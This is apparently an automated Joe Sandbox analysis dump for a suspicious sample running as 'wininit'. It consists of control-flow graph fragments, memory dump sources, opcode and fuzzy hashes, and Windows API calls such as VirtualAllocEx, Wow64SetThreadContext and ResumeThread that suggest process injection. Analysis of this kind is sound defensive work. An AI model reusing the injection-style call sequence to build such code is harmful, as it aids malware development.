                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 646 6667d10-6667da5 ReadProcessMemory 649 6667da7-6667dad 646->649 650 6667dae-6667dde 646->650 649->650
                                                                                                                                APIs
                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06667D98
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1802962027.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_6660000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                • Opcode ID: 2f6eccdf21352111d98c6fc7fbff5b0d4e462ae8c04f4cab9c6e0d23ba1df5c0
                                                                                                                                • Instruction ID: 7f62db4596d8aa1233ad37864f3e357d63a386ac1927679f724976fd3c2b8b64
                                                                                                                                • Opcode Fuzzy Hash: 2f6eccdf21352111d98c6fc7fbff5b0d4e462ae8c04f4cab9c6e0d23ba1df5c0
                                                                                                                                • Instruction Fuzzy Hash: 152136B18002599FCB10DFAAC945BEEBBF5FF48324F108429E558A7250D7389545CBA0

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 635 6667a8a-6667adb 638 6667add-6667ae9 635->638 639 6667aeb-6667b1b Wow64SetThreadContext 635->639 638->639 641 6667b24-6667b54 639->641 642 6667b1d-6667b23 639->642 642->641
                                                                                                                                APIs
                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06667B0E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1802962027.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_6660000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 983334009-0
                                                                                                                                • Opcode ID: 7264448112092cd0631fe59a51af587e71eb93db4a26b1b7ca9a5273fccd0d4f
                                                                                                                                • Instruction ID: 28522bad195dcc91fcb74a854df77b2ce40fafa94b7ad7a3746b8e4af69cb13f
                                                                                                                                • Opcode Fuzzy Hash: 7264448112092cd0631fe59a51af587e71eb93db4a26b1b7ca9a5273fccd0d4f
                                                                                                                                • Instruction Fuzzy Hash: AA2137B19003099FDB10DFAAC585BEEBFF4EB48324F148429E459A7340DB789985CFA5

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 654 254d5e9-254d684 DuplicateHandle 655 254d686-254d68c 654->655 656 254d68d-254d6aa 654->656 655->656
                                                                                                                                APIs
                                                                                                                                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0254D5B6,?,?,?,?,?), ref: 0254D677
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1795011625.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_2540000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: DuplicateHandle
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 3793708945-0
                                                                                                                                • Opcode ID: a8afa7ec9b73f5fe03b32c7175e5447bcfb0462b7af379f863d051d6d9a81fa1
                                                                                                                                • Instruction ID: 52baf3077e91b68664533d6d38320eda580497e30ffec64c4353817ddb0bdda9
                                                                                                                                • Opcode Fuzzy Hash: a8afa7ec9b73f5fe03b32c7175e5447bcfb0462b7af379f863d051d6d9a81fa1
                                                                                                                                • Instruction Fuzzy Hash: 4B21E2B5901218AFDB10CFAAD984ADEFFF4FB48324F14801AE958A7310C374A945CFA5
                                                                                                                                APIs
                                                                                                                                • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 06667D98
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1802962027.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_6660000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MemoryProcessRead
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 1726664587-0
                                                                                                                                • Opcode ID: 7efee53055ee56f075a848f7e5acb4deccc112f6130cd788afbb0c7c689474e9
                                                                                                                                • Instruction ID: 8c0a3c97b705e85e997c5cff50dd6cd5568c99d15ae49dcd01f0494b1b2796ab
                                                                                                                                • Opcode Fuzzy Hash: 7efee53055ee56f075a848f7e5acb4deccc112f6130cd788afbb0c7c689474e9
                                                                                                                                • Instruction Fuzzy Hash: 672139B1C003599FCB10DFAAC941AEEFBF5FF48324F108429E558A7250C7349544CBA5
                                                                                                                                APIs
                                                                                                                                • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06667B0E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1802962027.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_6660000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ContextThreadWow64
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 983334009-0
                                                                                                                                • Opcode ID: d39c8eea14ea336c495924adb6cd6fa1bfbabc0a6918eaa289d2aee1a582f9ab
                                                                                                                                • Instruction ID: 136a81c602c3d884fc3de9de5f0b6a320e99396fe5fd937a93aaf14d2b2a44c8
                                                                                                                                • Opcode Fuzzy Hash: d39c8eea14ea336c495924adb6cd6fa1bfbabc0a6918eaa289d2aee1a582f9ab
                                                                                                                                • Instruction Fuzzy Hash: B92107B19003098FDB50DFAAC585BAEBBF4EB48324F148429D459A7250C7789945CFA5
                                                                                                                                APIs
                                                                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06667BD6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1802962027.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_6660000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                • Opcode ID: 6ae7a345e7b9a0fd6b68dce74feb3ac3e5e3e2c44a833d9c4a19678af004b904
                                                                                                                                • Instruction ID: 52c2bb3e2edc30211d2cfed8c95ccbe6cb4d72a7dcf77f7f4dd48eb0f11c4bfc
                                                                                                                                • Opcode Fuzzy Hash: 6ae7a345e7b9a0fd6b68dce74feb3ac3e5e3e2c44a833d9c4a19678af004b904
                                                                                                                                • Instruction Fuzzy Hash: 821167B29002489FCB10DFAAC944BDFBFF5EF88324F208419E559A7250C7359944CFA0
                                                                                                                                APIs
                                                                                                                                • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 06667BD6
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1802962027.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_6660000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: AllocVirtual
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4275171209-0
                                                                                                                                • Opcode ID: c748ed33a46c394706d9a6676f12b24bf81686c37918d05beb083b954eea97b6
                                                                                                                                • Instruction ID: 59d6e2db50fa8181576f569922fdcabb51da96537356410ba66a734e629fbbaf
                                                                                                                                • Opcode Fuzzy Hash: c748ed33a46c394706d9a6676f12b24bf81686c37918d05beb083b954eea97b6
                                                                                                                                • Instruction Fuzzy Hash: DA1149719002499FCB10DFAAD844BDFBFF5EF88324F108419E555A7250C775A544CFA5
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1802962027.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_6660000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ResumeThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 947044025-0
                                                                                                                                • Opcode ID: 77b479db67a48f939a0bb7d7ec059a647758cc1e468be60d0cd6e555a55d0ff3
                                                                                                                                • Instruction ID: a9dec6124cf2bd25a36c47e223ff9a418d15cc33905ff56feabe8f228989103e
                                                                                                                                • Opcode Fuzzy Hash: 77b479db67a48f939a0bb7d7ec059a647758cc1e468be60d0cd6e555a55d0ff3
                                                                                                                                • Instruction Fuzzy Hash: 7E1128B1D002488BCB20DFAAD9457DEFFF5EB88324F248419D459A7350CA75A544CBA5
                                                                                                                                APIs
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1802962027.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_6660000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: ResumeThread
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 947044025-0
                                                                                                                                • Opcode ID: 288fac5dc3e16ca5cbb835f298929eb935c6b1420bfb67ac8e1864fef319cb81
                                                                                                                                • Instruction ID: fe063b71412c7ee8d840909a655d906e95fa7b333f3c3c2d7c9381263a81b71d
                                                                                                                                • Opcode Fuzzy Hash: 288fac5dc3e16ca5cbb835f298929eb935c6b1420bfb67ac8e1864fef319cb81
                                                                                                                                • Instruction Fuzzy Hash: 801125B19002488BCB20DFAAD9457DEFBF4EB88324F208429D459A7250CA75A944CBA5
                                                                                                                                APIs
                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0254AF5E
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1795011625.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_2540000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: HandleModule
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 4139908857-0
                                                                                                                                • Opcode ID: 3dd284742ac9f588fabd9878d38995f873743794b0e453f6b7d7b9ef4f048fd0
                                                                                                                                • Instruction ID: 5f565c031d6b24531611fe826b4d46252e05dddf504fce4d657bc30f36906ff7
                                                                                                                                • Opcode Fuzzy Hash: 3dd284742ac9f588fabd9878d38995f873743794b0e453f6b7d7b9ef4f048fd0
                                                                                                                                • Instruction Fuzzy Hash: A01110B6C003499FDB10CF9AC444ADEFBF4EB88328F10856AD858A7210C379A545CFA5
                                                                                                                                APIs
                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0666A715
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1802962027.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_6660000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePost
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 410705778-0
                                                                                                                                • Opcode ID: 0c0299bbe7fcf9df4c04fac9daf0f5307208c4b0c2726bd351ac3917170742f8
                                                                                                                                • Instruction ID: 51b99d24f62b8e884cb8e63e458cebaa352a76133eb4bdc8fcb8e0fe5211dae2
                                                                                                                                • Opcode Fuzzy Hash: 0c0299bbe7fcf9df4c04fac9daf0f5307208c4b0c2726bd351ac3917170742f8
                                                                                                                                • Instruction Fuzzy Hash: 8111F5B58003499FCB50DF9AD845BDEBBF8EB48324F108459E558A7310C375A944CFA5
                                                                                                                                APIs
                                                                                                                                • PostMessageW.USER32(?,00000010,00000000,?), ref: 0666A715
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1802962027.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_6660000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: MessagePost
                                                                                                                                • String ID:
                                                                                                                                • API String ID: 410705778-0
                                                                                                                                • Opcode ID: a5cd33f54634b6688b16e5261536b99e96f987f0ce7277c342022de7c7fea9dd
                                                                                                                                • Instruction ID: f73b954b796960fccc8660f09fb321f44c536e1753759209573d5b50843f2046
                                                                                                                                • Opcode Fuzzy Hash: a5cd33f54634b6688b16e5261536b99e96f987f0ce7277c342022de7c7fea9dd
                                                                                                                                • Instruction Fuzzy Hash: BB1122B58003489FDB10DF8AD884BDEBBF8EB48324F108459E958B7310C374A944CFA5
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1793727378.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_b8d000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: ae505882361efc24b18d87f0cedcd127b74812a760b64a1677f1949fc1379a00
                                                                                                                                • Instruction ID: 770c3b8b9fef83106fe1e2bd5b980ea012fa8f21e580add168c3b8ac4affa169
                                                                                                                                • Opcode Fuzzy Hash: ae505882361efc24b18d87f0cedcd127b74812a760b64a1677f1949fc1379a00
                                                                                                                                • Instruction Fuzzy Hash: 1E210A71504204DFDB05EF14D9C4B17BFA5FB94324F28C5AAD9094B3A6C336E856C7A1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1794255277.000000000234D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0234D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_234d000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 89778cbf66811a87c3197a17e8b6527b728ca2930442b54d06644e5adffa6415
                                                                                                                                • Instruction ID: df4932ab6fab0455fe0fc5644efb820e88b592646ca191792d6929a5b915ab38
                                                                                                                                • Opcode Fuzzy Hash: 89778cbf66811a87c3197a17e8b6527b728ca2930442b54d06644e5adffa6415
                                                                                                                                • Instruction Fuzzy Hash: E3212671614208EFDB05DF14D9C4B26BBE5FB88314F20C6ADED094B356CB36E446CA61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1794255277.000000000234D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0234D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_234d000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 44accc4db70db50dce255aaccfbb0c2b7ee24191b55ef55d0d951e83ddfd9fb3
                                                                                                                                • Instruction ID: f43297d7cf24f248353d67eed9b1007f9c68d3672eb4a77ab900cc0f50bda99a
                                                                                                                                • Opcode Fuzzy Hash: 44accc4db70db50dce255aaccfbb0c2b7ee24191b55ef55d0d951e83ddfd9fb3
                                                                                                                                • Instruction Fuzzy Hash: 7E21F271604208DFDB14DF14D984B26BBA5FB84314F20C5ADD80A4B256CB3AF447CA61
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1794255277.000000000234D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0234D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_234d000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: b8c9f38149da2a4986f9f22c7eb5179d52923a8220985be17e746ff20e202217
                                                                                                                                • Instruction ID: 344b507fa25bde0a5fbed0591196288511addc5d2f5cb297892e187c184f20df
                                                                                                                                • Opcode Fuzzy Hash: b8c9f38149da2a4986f9f22c7eb5179d52923a8220985be17e746ff20e202217
                                                                                                                                • Instruction Fuzzy Hash: 982192755083849FCB02CF14D994711BFB1EB46314F28C5DAD8498F2A7C33AE80ACB62
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1793727378.0000000000B8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B8D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_b8d000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                • Instruction ID: 91c6d6a8ed4bb326f18c4264613658aa4bff159436fc4d601d334a5edef4bf21
                                                                                                                                • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                • Instruction Fuzzy Hash: E711E172504240DFCB02DF00D5C4B16BFB1FB94324F28C2AAD8090B366C33AE85ACBA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1794255277.000000000234D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0234D000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_234d000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                • Instruction ID: 7d60935a8b480920fe3196e439fd810962426f737b340cd1b07231b5526abfaa
                                                                                                                                • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                • Instruction Fuzzy Hash: 11118B75504284DFDB16CF14D5C4B15BBB1FB84218F24C6AADC494B696C33AE44ACB61
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1802962027.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_6660000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: z|>
                                                                                                                                • API String ID: 0-1134487427
                                                                                                                                • Opcode ID: 09893f1c82730e581288e525053f608407b4faf40e9725881fff514d95694c38
                                                                                                                                • Instruction ID: 60f905d4ed0e70c32ebf3dff6c4decd71956f76e029a9254f818591f6aa26c7c
                                                                                                                                • Opcode Fuzzy Hash: 09893f1c82730e581288e525053f608407b4faf40e9725881fff514d95694c38
                                                                                                                                • Instruction Fuzzy Hash: 6EE1FA74E101198FDB54DFA9D5809AEBBF2FF89304F248169E414A7359DB30AD42CFA0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1802962027.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_6660000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Y>0
                                                                                                                                • API String ID: 0-1250427286
                                                                                                                                • Opcode ID: 1466db5276448a9ab2ba75abc8008c2bed7e203db8e780151b18532a060e009d
                                                                                                                                • Instruction ID: 68a0a5ce9ea08d32f7af16a2153eb9e668c6d4ebc0c5be89c26d565bd3e9eab8
                                                                                                                                • Opcode Fuzzy Hash: 1466db5276448a9ab2ba75abc8008c2bed7e203db8e780151b18532a060e009d
                                                                                                                                • Instruction Fuzzy Hash: FEE1FA74E102198FDB54DFA9D5819AEFBF2BF88304F248169E415AB355DB30AD42CFA0
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1802962027.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_6660000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: fo_N
                                                                                                                                • API String ID: 0-3502626514
                                                                                                                                • Opcode ID: c37d3b220c62c62e137ed803e5cde82724a5d7cf57aa39237a2a8040c4b8030c
                                                                                                                                • Instruction ID: 2bf9724422ef9f03c60aab4be8fd12fc51bc20e6484bcdecd21cfcc2a3b93b4b
                                                                                                                                • Opcode Fuzzy Hash: c37d3b220c62c62e137ed803e5cde82724a5d7cf57aa39237a2a8040c4b8030c
                                                                                                                                • Instruction Fuzzy Hash: 46E13C74E001198FDB54DFA9D5809AEFBF2FF88304F248169E415AB35ADB30A942CF60
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1802962027.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_6660000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: a2ac3c5ba3c3a8e1f8eb60309036bfb66437b731ee22159d0a0a4a849d4c035a
                                                                                                                                • Instruction ID: 50e1adaf71d0a97a3677be3fc976278931495391b952a349583573923384b54f
                                                                                                                                • Opcode Fuzzy Hash: a2ac3c5ba3c3a8e1f8eb60309036bfb66437b731ee22159d0a0a4a849d4c035a
                                                                                                                                • Instruction Fuzzy Hash: 50E11A74E101198FDB54DFA9D5809AEFBF2BF88304F248169E414AB356DB30AD42CFA1
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1802962027.0000000006660000.00000040.00000800.00020000.00000000.sdmp, Offset: 06660000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_6660000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 92573f0c36616a7a068f2520178a4862eeebc58a35d5e3bc9b98d4841ebcb431
                                                                                                                                • Instruction ID: a8348dd85f1736363eada92a332b1d7569269da9a15c349e03616591fad8d71b
                                                                                                                                • Opcode Fuzzy Hash: 92573f0c36616a7a068f2520178a4862eeebc58a35d5e3bc9b98d4841ebcb431
                                                                                                                                • Instruction Fuzzy Hash: 06E11974E001198FDB54DFA9D5819AEFBF2BF89304F248169E415AB356DB30AD42CFA0
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000006.00000002.1795011625.0000000002540000.00000040.00000800.00020000.00000000.sdmp, Offset: 02540000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_6_2_2540000_wininit.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 5b0865cf86df219cd3e54170764b82f68353e3f5750979c631a7b9d103f918e4
                                                                                                                                • Instruction ID: e11623caec824705e0c4126c67b273da74a9b0f9d928bc526b5358e852af35df
                                                                                                                                • Opcode Fuzzy Hash: 5b0865cf86df219cd3e54170764b82f68353e3f5750979c631a7b9d103f918e4
                                                                                                                                • Instruction Fuzzy Hash: E9A15F32A002068FCF15DFA8C84499EBBB2FF85308B15856AE905AB665DF75ED06CB40

                                                                                                                                Execution Graph

                                                                                                                                Execution Coverage:31%
                                                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                                                Signature Coverage:4.4%
                                                                                                                                Total number of Nodes:1846
                                                                                                                                Total number of Limit Nodes:92
                                                                                                                                execution_graph 9703 40c640 9730 404bee 9703->9730 9706 40c70f 9707 404bee 6 API calls 9708 40c66b 9707->9708 9709 404bee 6 API calls 9708->9709 9715 40c708 9708->9715 9712 40c683 9709->9712 9710 402bab 2 API calls 9710->9706 9711 40c701 9714 402bab 2 API calls 9711->9714 9712->9711 9713 404bee 6 API calls 9712->9713 9718 40c694 9713->9718 9714->9715 9715->9710 9716 40c6f8 9717 402bab 2 API calls 9716->9717 9717->9711 9718->9716 9737 40c522 9718->9737 9720 40c6a9 9721 40c6ef 9720->9721 9723 405872 4 API calls 9720->9723 9722 402bab 2 API calls 9721->9722 9722->9716 9724 40c6c5 9723->9724 9725 405872 4 API calls 9724->9725 9726 40c6d5 9725->9726 9727 405872 4 API calls 9726->9727 9728 40c6e7 9727->9728 9729 402bab 2 API calls 9728->9729 9729->9721 9731 402b7c 2 API calls 9730->9731 9732 404bff 9731->9732 9733 404c3b 9732->9733 9734 4031e5 4 API calls 9732->9734 9733->9706 9733->9707 9735 404c28 9734->9735 9735->9733 9736 402bab 2 API calls 9735->9736 9736->9733 9738 402b7c 2 API calls 9737->9738 9739 40c542 9738->9739 9739->9720 9740 405941 9741 4031e5 4 API calls 9740->9741 9742 405954 9741->9742 8307 409046 8320 413b28 8307->8320 8309 40906d 8311 405b6f 6 API calls 8309->8311 8310 40904e 8310->8309 8312 403fbf 7 API calls 8310->8312 8313 40907c 8311->8313 8312->8309 8314 409092 8313->8314 8324 409408 8313->8324 8316 4090a3 8314->8316 8319 402bab 2 API calls 8314->8319 8318 402bab 2 API calls 8318->8314 8319->8316 8321 413b31 8320->8321 8322 413b38 8320->8322 8323 404056 6 API calls 8321->8323 8322->8310 8323->8322 8325 409413 8324->8325 8326 40908c 8325->8326 8338 409d36 8325->8338 8326->8318 8337 40945c 8444 40a35d 8337->8444 8339 409d43 8338->8339 8340 40a35d 4 API calls 8339->8340 8341 409d55 8340->8341 8342 4031e5 4 API calls 8341->8342 8343 409d8b 8342->8343 8344 4031e5 4 API calls 8343->8344 8345 409dd0 8344->8345 8346 405b6f 6 API calls 8345->8346 8377 409423 8345->8377 8349 409df7 8346->8349 8347 409e1c 8348 4031e5 4 API calls 8347->8348 8347->8377 8350 409e62 8348->8350 8349->8347 8351 402bab 2 API calls 8349->8351 8352 4031e5 4 API calls 8350->8352 8351->8347 8353 409e82 8352->8353 8354 4031e5 4 API calls 8353->8354 8355 409ea2 8354->8355 8356 4031e5 4 API calls 8355->8356 8357 409ec2 8356->8357 8358 4031e5 4 API calls 8357->8358 8359 409ee2 8358->8359 8360 4031e5 4 API calls 8359->8360 8361 409f02 8360->8361 8362 4031e5 4 API calls 8361->8362 8363 409f22 8362->8363 8364 4031e5 4 API calls 8363->8364 8367 409f42 8364->8367 8365 40a19b 8366 408b2c 4 API calls 8365->8366 8366->8377 8367->8365 8368 409fa3 8367->8368 8369 405b6f 6 API calls 8368->8369 8368->8377 8370 409fbd 8369->8370 8371 40a02c 8370->8371 8372 402bab 2 API calls 8370->8372 8373 4031e5 4 API calls 8371->8373 8399 40a16d 8371->8399 8375 409fd7 8372->8375 8376 40a070 8373->8376 8374 402bab 2 API calls 8374->8377 8378 405b6f 6 API calls 8375->8378 8379 4031e5 4 API calls 8376->8379 8377->8337 8400 4056bf 8377->8400 8381 409fe5 8378->8381 8380 40a090 8379->8380 8382 4031e5 4 API calls 8380->8382 8381->8371 8383 402bab 2 API calls 8381->8383 8384 40a0b0 8382->8384 8385 409fff 8383->8385 8388 4031e5 4 API calls 8384->8388 8386 405b6f 6 API calls 8385->8386 8387 40a00d 8386->8387 8387->8371 8390 40a021 8387->8390 8389 40a0d0 8388->8389 8392 4031e5 4 API calls 8389->8392 8391 402bab 2 API calls 8390->8391 8391->8377 8393 40a0f0 8392->8393 8394 4031e5 4 API calls 8393->8394 8396 40a110 8394->8396 8395 40a134 8395->8399 8454 408b2c 8395->8454 8396->8395 8397 4031e5 4 API calls 8396->8397 8397->8395 8399->8374 8399->8377 8401 402b7c 2 API calls 8400->8401 8402 4056cd 8401->8402 8403 4056d4 8402->8403 8404 402b7c 2 API calls 8402->8404 8405 408c4d 8403->8405 8404->8403 8406 413ba4 6 API calls 8405->8406 8407 408c5c 8406->8407 8408 408f02 8407->8408 8409 408f3a 8407->8409 8412 40903e 8407->8412 8411 405b6f 6 API calls 8408->8411 8410 405b6f 6 API calls 8409->8410 8426 408f51 8410->8426 8413 408f0c 8411->8413 8428 413aca 8412->8428 8413->8412 8417 408f31 8413->8417 8457 40a1b6 8413->8457 8415 405b6f 6 API calls 8415->8426 8416 402bab 2 API calls 8416->8412 8417->8416 8419 409031 8420 402bab 2 API calls 8419->8420 8420->8417 8421 409022 8422 402bab 2 API calls 8421->8422 8423 409028 8422->8423 8424 402bab 2 API calls 8423->8424 8424->8417 8425 402bab GetProcessHeap HeapFree 8425->8426 8426->8412 8426->8415 8426->8417 8426->8419 8426->8421 8426->8425 8427 40a1b6 14 API calls 8426->8427 8491 4044ee 